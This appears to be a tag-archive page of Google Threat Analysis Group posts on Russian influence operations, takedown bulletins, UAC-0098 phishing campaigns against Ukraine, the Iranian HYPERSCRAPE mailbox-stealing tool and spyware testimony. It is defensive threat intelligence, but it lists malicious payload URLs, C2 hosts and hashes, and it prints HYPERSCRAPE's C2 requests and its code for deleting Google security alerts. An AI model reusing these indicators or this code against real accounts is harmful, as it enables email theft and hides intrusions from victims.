Tag Archives: Threat Analysis Group

New details on commercial spyware vendor Variston

The Threat Analysis Group shares new information on the commercial spyware vendor Variston.

Source: The Official Google Blog

Prigozhin interests and Russian information operations

One of Threat Analysis Group’s (TAG) missions is to understand and disrupt coordinated information operations (IO) threat actors. Our research enables Google teams to make enforcement decisions backed by rigorous analysis. TAG’s investigations do not focus on making judgements about the content on Google platforms, but rather examining technical signals, heuristics, and behavioral patterns to make an assessment that activity is coordinated inauthentic behavior.

In this post, TAG is highlighting four case studies involving Russian IO tied to the Internet Research Agency (IRA) and its financier, Russian oligarch Yevgeny Prigozhin. In several cases, those campaigns served the dual purpose of promoting Russia’s agenda and Prigozhin’s business interests.

These examples underline broader trends we’re seeing: Russian IO groups are increasingly obscuring their role in influence operations, relying on stronger operational security and cutouts (intermediaries to mask their work) to dissociate themselves from user-facing activity. They launder their messages via local media brands, NGOs and PR firms that were in fact created by Russian shell companies. And in some cases, IRA-affiliated actors have responded to platforms’ enforcement efforts by moving to more permissive online spaces and platforms.

IO amplifying Prigozhin’s pro-Russian films

Prigozhin has financed several movies through a partial ownership stake in the film company, Aurum LLC. The company’s movies show Russia — especially the Russian military and mercenaries — in a positive light. The films have high production values and fictionalize Russia’s actions abroad in the style of Hollywood action movies. Storylines in the films include depictions of Russian soldiers in the Central African Republic, soldiers defending native Russians in Ukraine, and even a satire about the IRA and its role in the 2016 US elections. In 2021, they released “Солнцепёк” (“Sunlight” or “Blazing Sun” in English), which takes place in eastern Ukraine and claims to be a story based on true events from 2014 of Russian mercenaries, connected to the paramilitary Wagner Group, protecting Russians in Ukraine against Ukrainian forces.

Shortly after Russia’s invasion of Ukraine, TAG identified several IRA-affiliated news sites hosting ads to drive traffic to the videos including sites like newinform[.]com and slovodel[.]com. While the film was an older release from 2021, the timing of this campaign was notable because the subject matter mirrored newly topical real world events in Ukraine in a way that portrayed Russia positively. Google terminated nine new IRA-linked accounts using Ads to advertise the film and 44 new IRA-linked YouTube channels hosting clips, the full-length film and related comments. Some accounts claimed to be officially affiliated with the film, while others presented themselves as fan accounts.

A movie advertisement featuring the film's poster

Advertisement for the movie “Sunlight” on an IRA-affiliated news site

IRA-linked IO campaigns in Africa

In recent years, Russian IO actors tied to Prigozhin and the IRA, have peddled influence campaigns promoting the interests of Russia and Prigozhin’s Wagner Group in Africa. Researchers at Stanford, Graphika, and our colleagues at Meta have documented this trend going back to 2019. These campaigns involved creating NGOs, media brands and news agencies across Africa including a Ghanaian NGO, Sudan Daily, Peace Data and SADC News. These entities presented themselves as independent non-profit organizations and recruited local journalists and subject matter experts to publish content on topics like pro-Russia narratives, African pride and empowerment, and stories suggesting that Western imperialism is destroying Africa. Some authors likely did not realize they were working for a Russia-backed IO and genuinely believed in the content they wrote.

TAG’s investigations align with these earlier findings. Google terminated accounts and channels associated with the IRA’s fake media brands and NGOs throughout 2019 and 2020. This included IRA-linked accounts using Gmail to create profiles on non-Google social platforms, creating YouTube channels affiliated with the so-called news brands, and publishing content to Blogger.

In March 2021, Google shut down activity by several IRA-linked actors who published content promoting Wagner’s operations in Africa along with pro-Russia narratives. These articles appeared on Blogger and a number of non-Google blogging platforms such as Balalaika, Hashtap, Technowar and Voskhodinfo. The blogs amplified false narratives that the United Nations is funding terrorists in the Central African Republic and that Syrians need Wagner protection. The blogs were not backed by a social media presence.

Example of a blog posted by an IRA-affiliated account

a blog heading showing a person holding a rocket launcher

Example of a blog posted by an IRA-affiliated account

In September 2022 Google terminated three IRA-linked YouTube channels that were sharing content in French and supportive of Russian policy objectives in Libya, including promoting a film in the Shugaley trilogy, another Aurum LLC film.

IRA influence operations concerning Ukraine

Russia’s agenda in Ukraine has also been a consistent, but not overwhelming, focal point for IRA-linked influence campaigns. In February 2022, Google terminated five YouTube channels and 21 Blogger blogs posting coordinated narratives on Blogger, YouTube and the Ukrainian blogging platform, Hashtap. In addition to domestically-focused content about Russia, several of the narratives focused on maligning Ukraine. These included allegations of Ukrainians deceiving Europe and stories of how Kyiv authorities failed to properly handle the Covid-19 pandemic. This activity spanned multiple blogging platforms and TAG observed the same IRA-linked accounts posted similar commentary across various news sites.

a muted and off-color flag is used at the top of a blog

IRA-created blog on Blogger criticizing EU support for Ukraine

IRA IO targeting domestic Russian audiences

Google regularly disrupts activity by IRA-linked accounts targeting Russian domestic audiences. These are often clusters of related accounts that create YouTube channels, upload videos, and comment and upvote each other’s videos. The activity occurs during Russian work hours, with narratives focused on Russian domestic issues and typically targeting political dissidents. In October 2022, Google terminated a cluster of nearly 700 IRA-linked accounts that were posting YouTube Shorts. The Shorts were crafted for a Russian domestic audience, praising Russian soldiers in Ukraine, and had negligible views or subscribers.

Other campaigns have focused on blogs. In July 2021, Google terminated 28 Blogger blogs created by IRA-linked accounts. Narratives in the blogs focused on Russian domestic affairs, including stories dismissing protests supporting anti-corruption activist, Alexei Navalny, denigrating local opposition politicians, criticizing the mayor of St. Petersburg and praising the heroics of Wagner Group. IRA actors also mirrored the same content on Ukrainian blogging platform, Hashtap. In some cases, multiple Blogger profiles published very similar or near-identical content.

The evolution of the Russian IO landscape

These case studies underscore several developments TAG observes in Russian IO activity. The accounts created lack well-developed, and backstopped personas, and increasingly are disrupted before they can gain traction. Russian IO actors also increasingly obscure their role, using stronger operational security and a range of intermediaries to conduct the actual user-facing activity. These proxies include third party PR firms, marketing agents, or unknowing local journalists and creators. Using well-selected proxies launders their legitimacy, and this provides an advantage compared to creating direct personas with little reach.

In our investigations of IRA-backed IO, we have also noted several cases where the narratives pushed by the IRA serve a dual purpose. Not only do they amplify messages supporting Russia, they also promote the business interests of oligarch, Yevgeny Prigozhin. Prigozhin has organized his empire around projects that directly and indirectly support the Russian state, and as the main financier of the IRA, he has cleverly leveraged his IO apparatus to amplify narratives that benefit not only Russia, but his own business interests as well.

Source: The Official Google Blog

Prigozhin interests and Russian information operations

IO amplifying Prigozhin’s pro-Russian films

Advertisement for the movie “Sunlight” on an IRA-affiliated news site

IRA-linked IO campaigns in Africa

Example of a blog posted by an IRA-affiliated account

IRA influence operations concerning Ukraine

IRA-created blog on Blogger criticizing EU support for Ukraine

IRA IO targeting domestic Russian audiences

The evolution of the Russian IO landscape

Source: The Official Google Blog

TAG Bulletin: Q3 2022

This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q3 2022. It was last updated on October 26, 2022.

July

We terminated 7 YouTube channels as part of our investigation into coordinated influence operations linked to Russia. The campaign was linked to a Russian consulting firm and was sharing content in Russian that was supportive of Russia and critical of Ukraine and the U.S.
We terminated 7 YouTube channels and 3 AdSense accounts as part of our investigation into coordinated influence operations linked to China. The campaign was sharing content in English and Chinese that was supportive of the Chinese semiconductor and tech industries and critical of the U.S. semiconductor industry and U.S. sanctions on Chinese tech companies.
We terminated 2,150 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China. These channels mostly uploaded spammy content in Chinese about music, entertainment, and lifestyle. A very small subset uploaded content in Chinese and English about China and U.S. foreign affairs. These findings are consistent with our previous reports.

August

We terminated 10 YouTube channels and blocked 120 domains from eligibility to appear on Google News surfaces and Discover as part of our investigation into coordinated influence operations linked to China. The campaign was linked to a Chinese PR firm named Shanghai Haixun Technology Co., Ltd. and was sharing content in English, Chinese, Russian, Ukrainian, Thai, Hindi, French, Arabic, Italian, Vietnamese and Korean that was critical of international news coverage of Xinjiang, the United States and its relationship with Taiwan, and high profile critics of the Chinese government. We received leads from Mandiant that supported us in this investigation.
We terminated 12 YouTube channels, 4 Ads accounts, and 2 Blogger blogs and blocked 3 domains from eligibility to appear on Google News surfaces and Discover as part of our investigation into coordinated influence operations linked to the United States. The campaign was sharing content in English, Arabic, Persian, and Russian that was promoting U.S. foreign affairs. We received leads from Twitter that supported us in this investigation.
We terminated 15 YouTube channels as part of our investigation into coordinated influence operations linked to Sudan. The campaign was sharing content in Arabic that was supportive of the Sudanese Rapid Support Forces and their leader Hemetti. We received leads from Twitter that supported us in this investigation.
We terminated 3 YouTube channels as part of our investigation into coordinated influence operations linked to Russia. The campaign was linked to the media outlet News Front and was sharing content in English and German that was supportive of Russia and critical of the United States. We received leads from Twitter that supported us in this investigation.
We terminated 1 AdSense account and blocked 1 domain from eligibility to appear on Google News surfaces and Discover as part of our investigation into coordinated influence operations linked to Turkey. The campaign was sharing content in Turkish that was supportive of Turkey’s AK Party. We received leads from Twitter that supported us in this investigation.
We terminated 12 YouTube channels as part of our investigation into coordinated influence operations linked to Russia. The campaign was linked to a Russian consulting firm and was sharing content in Russian that was supportive of Russia and the Russian military and critical of NATO, Ukraine, and the West. We received leads from Twitter that supported us in this investigation.
We terminated 15 YouTube channels, 2 AdSense accounts, and 1 Blogger blog as part of our investigation into coordinated influence operations linked to Vietnam. The campaign was sharing content in Chinese, Japanese, Korean, and German that was supportive of Russia and critical of Ukraine and China. We believe this operation was financially motivated.
We terminated 1 YouTube channel and 1 Ads account and blocked 1 domain from eligibility to appear on Google News surfaces and Discover as part of our investigation into coordinated influence operations linked to Russia. The campaign was sharing content in Russian that was critical of the United States, the EU, Ukraine, and NATO.
We terminated 1104 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China. These channels mostly uploaded spammy content in Chinese about music, entertainment, and lifestyle. A very small subset uploaded content in Chinese and English about China and U.S. foreign affairs. These findings are consistent with our previous reports.

September

We terminated 1 AdSense account and blocked 4 domains from eligibility to appear on Google News surfaces and Discover as part of our investigation into coordinated influence operations linked to North Macedonia. The campaign was sharing sensational content in English that was about a variety of topics including U.S. and European current events. We believe this operation was financially motivated.
We terminated 5 YouTube channels as part of our investigation into coordinated influence operations linked to Myanmar. The campaign was sharing content in Burmese that was critical of the People’s Defense Force of Myanmar.
We terminated 3 YouTube channels as part of our investigation into coordinated influence operations linked to Russia. The campaign was linked to the Internet Research Agency (IRA) and was sharing content in French that was supportive of Russian policy objectives in Libya. We received leads from the FBI that supported us in this investigation.
We blocked 1 domain from eligibility to appear on Google News surfaces and Discover as part of our investigation into coordinated influence operations linked to Iran. The campaign was sharing content in Arabic that was critical of the UAE, Saudi Arabia, and Bahrain.
We terminated 6957 YouTube channels and 144 Blogger blogs as part of our ongoing investigation into coordinated influence operations linked to China. These channels and blogs mostly uploaded spammy content in Chinese about music, entertainment, and lifestyle. A very small subset uploaded content in Chinese and English about China and U.S. foreign affairs. These findings are consistent with our previous reports.

Source: The Official Google Blog

Initial access broker repurposing techniques in targeted attacks against Ukraine

As the war in Ukraine continues, TAG is tracking an increasing number of financially motivated threat actors targeting Ukraine whose activities seem closely aligned with Russian government-backed attackers. This post provides details on five different campaigns conducted from April to August 2022 by a threat actor whose activities overlap with a group CERT-UA tracks as UAC-0098 [1, 2, 3]. Based on multiple indicators, TAG assesses some members of UAC-0098 are former members of the Conti cybercrime group repurposing their techniques to target Ukraine.

UAC-0098 is a threat actor that historically delivered the IcedID banking trojan, leading to human-operated ransomware attacks. The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations. TAG assesses UAC-0098 acted as an initial access broker for various ransomware groups including Quantum and Conti, a Russian cybercrime gang known as FIN12 / WIZARD SPIDER.

TAG is sharing additional context and indicators, including disclosing new campaigns that weren’t previously detailed or attributed to the group, to assist the security community in efforts to investigate and defend against this threat.

Initial Encounter

TAG started actively tracking UAC-0098 after identifying an email phishing campaign delivering AnchorMail (referred to as “LackeyBuilder”) in late April 2022. AnchorMail is a version of the Anchor backdoor that uses the simple mail transfer protocol (SMTPS) for command and control (C2) communication. The tool, assessed to be developed by the Conti group, previously was installed as a TrickBot module. TAG was able to connect the activity to earlier phishing emails targeting Ukraine with lures like:

Subject: Проєкт «Активні громадяни» (Project "Active citizen")

Subject: Файл_змінив,_бронь (File_change,_booking)

URLs:

https://activecitizens[.]in[.]ua/Project1[.]xls

https://lviv[.]uz[.]ua/Artists[.]xls

https://aprize[.]com[.]ua/Artists[.]xls

The campaign stood out because it appeared to be both financially and politically motivated. It also seemed experimental: instead of dropping AnchorMail directly, it used LackeyBuilder and batch scripts to build AnchorMail on the fly.

The UAC-0098 activity was then identified in another email campaign delivering IcedID and Cobalt Strike. On April 13, at least three Excel files were sent as attachments to Ukrainian organizations:

Мобілізаційний реєстр.xls (Mobilization register.xls)
8f7e3471c1bb2b264d1b8f298e7b7648dac84ffd8fb2125f3b2566353128e127
Мобілізаційний список.xls Mobilization list.xls 08d30d6646117cd96320447042fb3857b4f82d80a92f31ee91b16044b87929c0
Список мобілізованих громадян.xls List of mobilized citizens.xls 1f3c5dd0a79323c57ad194a49eebaaf2f624822df401995e51a4c58b5a607a45

The group was active from mid-April to mid-June of 2022, frequently changing its tactics, techniques and procedures (TTPs), tooling and lures. While the targeting varied from campaign to campaign, the group repeatedly targeted Ukrainian hotels.

Impersonating National Cyber Police of Ukraine

On May 11 2022, UAC-0098 launched another attack targeting organizations working in the hospitality industry. The phishing emails were impersonating the National Cyber Police of Ukraine and contained a download link, urging targets to download an update for their operating system.

The payload was hosted on https://cyberpolice.gov.uz[.]ua/article/KB5012599.msi, where gov.uz[.]ua , which is an attacker-controlled domain, registered just one day before the attack. During execution, the file runs a PowerShell script downloaded from http://blinkin[.]top/3538313546/license?serial={GENERATED_SERIAL} to fetch and execute an IcedID dll:

Indicators

https://drive.google[.]com/file/d/19ZtX3k38g2OXQnFkEj3JH4EiI_vUqgnK/view?usp=drive_web
gov[.]uz[.]ua
blinkin[.]top
kirbi[.]top

Expanded targeting to European NGOs using “Stolen Images Evidence”

On May 17, UAC-0098 used a compromised account of a hotel in India. The actor sent phishing emails with a ZIP archive attached containing a malicious XLL file. As before, the targets appeared to be organizations working in the hospitality industry in Ukraine.

When opened, the XLL file downloads a variant of IcedID from the following URL: http://84.32.190[.]34/KB2533623.exe.

In other campaigns, the same compromised email account was used to target humanitarian NGOs in Italy. IcedID was also delivered as an MSI file through the anonymous file sharing service dropfiles[.]me, with expiring links to the payload and a malware distribution service known as Stolen Images Evidence. This service typically uses website contact forms to send fake legal or copyright violation threats with a link to storage hosting a social engineering page, delivering malware chosen by the service’s customer.

“Stolen Images Evidence” distribution service delivering UAC-0098 payload

“dropfiles[.]me” file sharing website delivering UAC-0098 payload

Indicators

https://dropfiles[.]me/download/af46b89ae667c0d0/
http://storage.googleapis[.]com/cor1krp299kh13.appspot[.]com/
http://storage.googleapis[.]com/xpd9q3z05awvw4.appspot[.]com/
http://84.32.190[.]34/KB2533623.exe
donaldtr[.]com

Impersonating StarLink and Microsoft

On May 19, UAC-0098 used support@starlinkua[.]info to send phishing emails impersonating representatives of Elon Musk and StarLink, in order to deliver software required to connect to the internet using StarLink satellites. The email included a link to https://box[.]starlinkua[.]info/cloud/index[.]php/s/{GENERATED_ID}, an MSI installer dropping IcedID, downloaded from the attacker-controlled domain, starlinkua[.]info.

On May 23, a similar attack was performed against a wider range of Ukrainian organizations operating in the technology, retail and government sectors. The delivered payload was the same IcedID binary with filename KB2533623.msi to resemble a Microsoft update and was hosted on https://box[.]microsoftua[.]com/cloud/index[.]php/s/{GENERATED_ID}.

Indicators

support@starlinkua[.]info
starlinkua[.]info
microsoftua[.]com
baiden[.]top

Cobalt Strike delivered by malicious documents built by EtterSilent builder

On May 24, a newly registered domain kompromatua[.]info was used to target the Academy of Ukrainian Press (AUP). The phishing email contained a dropbox link pointing to a malicious document named “ABR090TAN-TS.xlsb”. The Excel document was created using EtterSilent, a malicious document builder used by many cybercrime groups. The malicious document directly fetched a Cobalt Strike dll from http://84.32.190[.]34/bc_https_x64.dll. Note, the same IP was used to deliver IcedID payloads in the second campaign on May 17. The attacker used the same link and the same file to target organizations from the hospitality industry.

Indicators

jurnalist@kompromatua[.]info
kompromatua[.]info
84.32.190[.]34

Follina Exploitation

On June 10, a few days after the CVE-2022-30190 (also known as Follina) disclosure, a weaponized exploit named clickme.rtf was uploaded to VirusTotal. Upon execution, the file fetched content from http://64.190.113[.]51/index[.]html. At that time, no content was delivered from the URL.

Nine days later, the same server was used, this time using port 8000, to serve content in a large-scale campaign exploiting the same vulnerability. On June 19, TAG disrupted a campaign with more than 10,000 spam emails impersonating the State Tax Service of Ukraine. The emails had an attached ZIP file containing a malicious RTF file. Upon execution, the next stage was downloaded from http://64.190.113[.]51:8000/index.html. This campaign was previously reported by CERT-UA and TAG’s update on cyber activity in Eastern Europe.

Phishing email used in a campaign exploiting CVE-2022-30190, translated from Ukrainian

The html file fetched Cobalt Strike, ked.dll, from 5.199.173[.]152. Shared code in the Cobalt Strike payload and IcedID suggests they are both encrypted with the same crypting service made by Conti group. This is aligned with IBM Security X-Force findings.

Indicators

http://64.190.113[.]51:8000/index[.]html
http://5.199.173[.]152/ked[.]dll
baidenfree[.]com

Conclusions

UAC-0098 activities are representative examples of blurring lines between financially motivated and government backed groups in Eastern Europe, illustrating a trend of threat actors changing their targeting to align with regional geopolitical interests.

In the initial encounter with UAC-0098, “lackeyBuilder” was observed for the first time. This is a previously undisclosed builder for AnchorMail, one of the private backdoors used by the Conti groups. Since then, the actor consistently used tools and services traditionally employed by cybercrime actors for the purpose of acquiring initial access: IcedID trojan, EtterSilent malicious document builder, and the “Stolen Image Evidence” social engineering malware distribution service.

In the activity observed following April 2022, the group’s targeting wildly varied from European NGOs to less targeted attacks on Ukrainian government entities, organizations and individuals. Rather uniquely, the group demonstrates strong interest in breaching businesses operating in the hospitality industry of Ukraine, going as far as launching multiple distinct campaigns against the same hotel chains. So far, TAG has not identified what post-exploitation actions UAC-0098 takes following a successful compromise.

Activities described in this post are consistent with findings from IBM Security X-Force and CERT-UA. TAG can further confirm attribution based on multiple overlaps between UAC-0098 and Trickbot or the Conti cybercrime group.

Source: The Official Google Blog

New Iranian APT data extraction tool

As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users. For years, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques to conduct espionage aligned with the interests of the Iranian government. Now, we’re shining light on a new tool of theirs.

In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts. The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials. We have seen it deployed against fewer than two dozen accounts located in Iran. The oldest known sample is from 2020, and the tool is still under active development. We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.

This post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a Telegram grabber tool. HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining purpose-built capabilities. Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.

HYPERSCRAPE Analysis

HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired. It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail. Once logged in, the tool changes the account’s language settings to English and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking them unread. After the program has finished downloading the inbox, it reverts the language back to its original settings and deletes any security emails from Google. Earlier versions contained the option to request data from Google Takeout, a feature which allows users to export their data to a downloadable archive file.

The tool is written in .NET for Windows PCs and is designed to run on the attacker's machine. We tested HYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo! and Microsoft accounts. HYPERSCRAPE won't run unless in a directory with other file dependencies.

HYPERSCRAPE file metadata

HYPERSCRAPE Setup

When launched, the tool makes an HTTP GET request to a C2 to check for a response body of "OK'' and will terminate if it's not found. In the version tested, the C2 was unobfuscated and stored as a hardcoded string. In later versions it was obfuscated with Base64.

GET http://{C2}/Index.php?Ck=OK HTTP/1.1

Host: {C2}

Accept-Encoding: gzip

Connection: Keep-Alive

The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file. A new form is displayed if the information is not provided via command prompt.

Image of a form specifying operation parameters

Initial form to specify operation parameters

Once provided, the data in the "Identity" field is sent to a C2 for confirmation. Again, the response is expected to be "OK".

GET http://{C2}/Index.php?vubc={identity} HTTP/1.1

Host: {C2}

Accept-Encoding: gzip

If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop.

An image showing a cookie drag and drop form

The cookie drag and drop form

After parsing, the cookies are inserted into a local cache used by the embedded web browser. A new folder named "Download" is created adjacent to the main binary. The browser then navigates to Gmail to begin the data collection.

The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail.

Image of an error page from using an unsupported browser

The error page from using an unsupported browser

If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.

The login page

What HYPERSCRAPE does

Once the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not. The language is returned to its original setting when the run is finished.

HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download. It does the following for each email found:

Clicks on the email and opens it
Downloads it
If the email was originally unread, marks it unread
Goes back to the inbox

The emails are saved with ".eml" extensions under the Downloads directory with the filename corresponding to the subject. A log file is written containing a count of the emails that were downloaded.

When finished, a HTTP POST request is made to the C2 to relay the status and system information. The downloaded emails are not sent to the C2.

POST http://{C2}/?Key={GUID}&Crc={Identifier}

{

"appName": "Gmail Downloader",

"targetname": "{Email}",

"HostName": "REDACTED",

"srcUserIP": "REDACTED",

"actionType": "First",

"timeOccurrence": "05/01/2022 05:50:31 PM",

"OS": "REDACTED",

"OSVersion": "REDACTED",

"SystemModel": "REDACTED",

"SystemType": "REDACTED",

"srcName": "REDACTED",

"srcOrgName": "REDACTED"

}

The program will delete any security emails from Google generated by the attacker’s activity.

private bool IsThereAnyEMail() {

List < GeckoHtmlElement > list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName("span")

where x.TextContent.StartsWith ("Security alert") || x.TextContent.StartsWith("Archive of Google data requested") || x.TextContent.StartsWith("Your Google data archive is ready") || x.TextContent.StartsWith("Your Google data is ready") || x.TextContent.StartsWith("Critical security alert") || x.TextContent.StartsWith("Access for less secure apps has been turned on") || x.TextContent.StartsWith("Review blocked sign-in attempt") || x.TextContent.StartsWith("Help us protect you: Security advice from Google") || x.TextContent.StartsWith("Access for less secure apps has been turned on")

select x).ToList < GeckoHtmlElement > ();

bool flag = list.Count == 0;

return !flag;

}

Early versions contained an option to request Google Takeout data

Data from Google Takeout is also available upon request, but the option was only found in early builds. The functionality was not automated and it's unclear why it was removed in later versions.

When conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to relay the cookies and account name, both of which are required to accomplish the Takeout. When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.

public void ManageTakeOut() {

string text = "PipeName";

Process process = new Process();

process.StartInfo.Arguments = string.Format("PIPE Google \"{0}\"", text);

process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName;

process.Start();

PipeCommunication pipeCommunication = new PipeCommunication(true, text);

bool flag = false;

while (!flag) {

try {

JsonInfo jsonInfo = pipeCommunication.Read();

switch (jsonInfo.Type) {

case JsonType.GetCookies:

jsonInfo.Data = this.CookieText;

pipeCommunication.Write(jsonInfo);

break;

case JsonType.TakeOutFile:

flag = true;

break;

case JsonType.GetUsername:

while (this.OperationObject.GetUsername() == null) {

Thread.Sleep(1000);

}

jsonInfo.Data = this.OperationObject.GetUsername();

pipeCommunication.Write(jsonInfo);

break;

}

} catch (Exception) {

bool hasExited = process.HasExited;

if (hasExited) {

flag = true;

}

pipeCommunication.Close();

}

Protecting Our Users

TAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security community, and for companies and individuals that may be targeted. It’s why we do things like work with our CyberCrime Investigation Group to share critical information relevant to law enforcement. We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry. We’ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services. In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.

HYPERSCRAPE Indicators

C2s

136.243.108.14

173.209.51.54

HYPERSCRAPE binaries

03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369

35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208

5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798

6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f

767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4

977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f

ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6

cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa

Microsoft Live DLL

1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23

PDB

E:\Working\Projects\EmailDownloader\EmailDownloaderCookieMode\EmailDownloader\obj\Debug\EmailDownloader.pdb

E:\Working\Projects\EmailDownloader\EmailDownloaderCookieMode\Mahdi\LiveLib\obj\Release\LiveLib.pdb

Source: The Official Google Blog

Google’s efforts to identify and counter spyware

The following testimony was delivered to the U.S. House Intelligence Committeeby Shane Huntley, Senior Director of Google’s Threat Analysis Group (TAG) on July 27, 2022.

Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee:

Thank you for the opportunity to appear before the Committee to discuss Google’s efforts to protect users from commercial spyware. We appreciate the Committee’s efforts to raise awareness about the commercial spyware industry that is thriving and growing, creating risks to Americans and Internet users across the globe.

Our expert teams

Google has been tracking the activities of commercial spyware vendors for years, and we have been taking critical steps to protect our users. We take the security of our users very seriously, and we have dedicated teams in place to protect against attacks from a wide range of sources. Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats. TAG actively monitors threat actors and the evolution of their tactics and techniques. For example, TAG has been closely tracking and disrupting campaigns targeting individuals and organizations in Ukraine, and frequently publishes reports on Russian threat actors.

We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers. We also publicly release information about the operations we disrupt, which is available to our government partners and the general public. TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber criminal activities, such as hacking and the use of spyware. And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet. We are joined in this effort by many other security teams at Google, including Project Zero, our team of security researchers at Google who study zero-day vulnerabilities in the hardware and software systems that are depended upon by users around the world.

Our ongoing work

Google has a long track record combating commercial surveillance tools targeting our users. In 2017, Android – which is owned by Google – was the first mobile platform to warn users about NSO Group’s Pegasus spyware. At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices. We observed fewer than three dozen installs of this spyware. We remediated the compromises for these users and implemented controls to protect all Android users.

NSO Group continues to pose risks across the Internet ecosystem. In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups’s marketing information suggesting that they had a 0-day exploit for Android. Google was able to identify the vulnerability in use and fix the exploit quickly. In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users. iPhone users could be compromised by receiving a malicious iMessage text, without ever needing to click a malicious link. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense. Based on our research and findings, we assessed this to be one of the most technically sophisticated exploits we had ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

Although this Committee must be concerned with the exploits of NSO Group, it is not the only entity posing risks to our users. For example, TAG discovered campaigns targeting Armenian users which utilized zero-day vulnerabilities in Chrome and Internet Explorer. We assessed that a surveillance vendor packaged and sold these technologies. Reporting by CitizenLab linked this activity to Candiru, an Israeli spyware vendor. Other reporting from Microsoft has linked this spyware to the compromise of dozens of victims, including political dissidents, human rights activists, journalists, and academics.

Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users. We assess with high confidence that commercial surveillance company Cytrox packaged these vulnerabilities, and sold the hacking software to at least eight governments. Among other targets, this spyware was used to compromise journalists and opposition politicians. Our reporting is consistent with earlier analysis produced by CitizenLab and Meta.

TAG also recently released information on a segment of attackers we call “hack-for-hire” that focuses on compromising accounts and exfiltrating data as a service. In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves. They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns. In June, we provided examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates.

The growth of commercial spyware vendors and hack-for-hire groups has necessitated growth in TAG to counter these threats. Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.

Risks posed by commercial spyware are increasing

Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments. These vendors operate with deep technical expertise to develop and operationalize exploits. We believe its use is growing, fueled by demand from governments.

Seven of the nine zero-day vulnerabilities our Threat Analysis Group discovered in 2021 were originally developed by commercial providers and sold to and used by state-sponsored actors. TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to state-sponsored actors.

This industry appears to be thriving. In fact, there was recently a large industry conference in Europe, sponsored by many of the commercial spyware vendors we track. This trend should be concerning to the United States and all citizens. These vendors are enabling the proliferation of dangerous hacking tools, arming nation state actors that would not otherwise be able to develop these capabilities in-house. While use of surveillance technologies may be legal under national or international laws, they are found to be used by some state actors for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers, and opposition party politicians.

We have also observed proliferation risk from nation state actors attempting to gain access to the exploits of these vendors. Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations. The actors behind this campaign, which we attributed to a government-backed entity based in North Korea, have employed a number of means to target researchers.

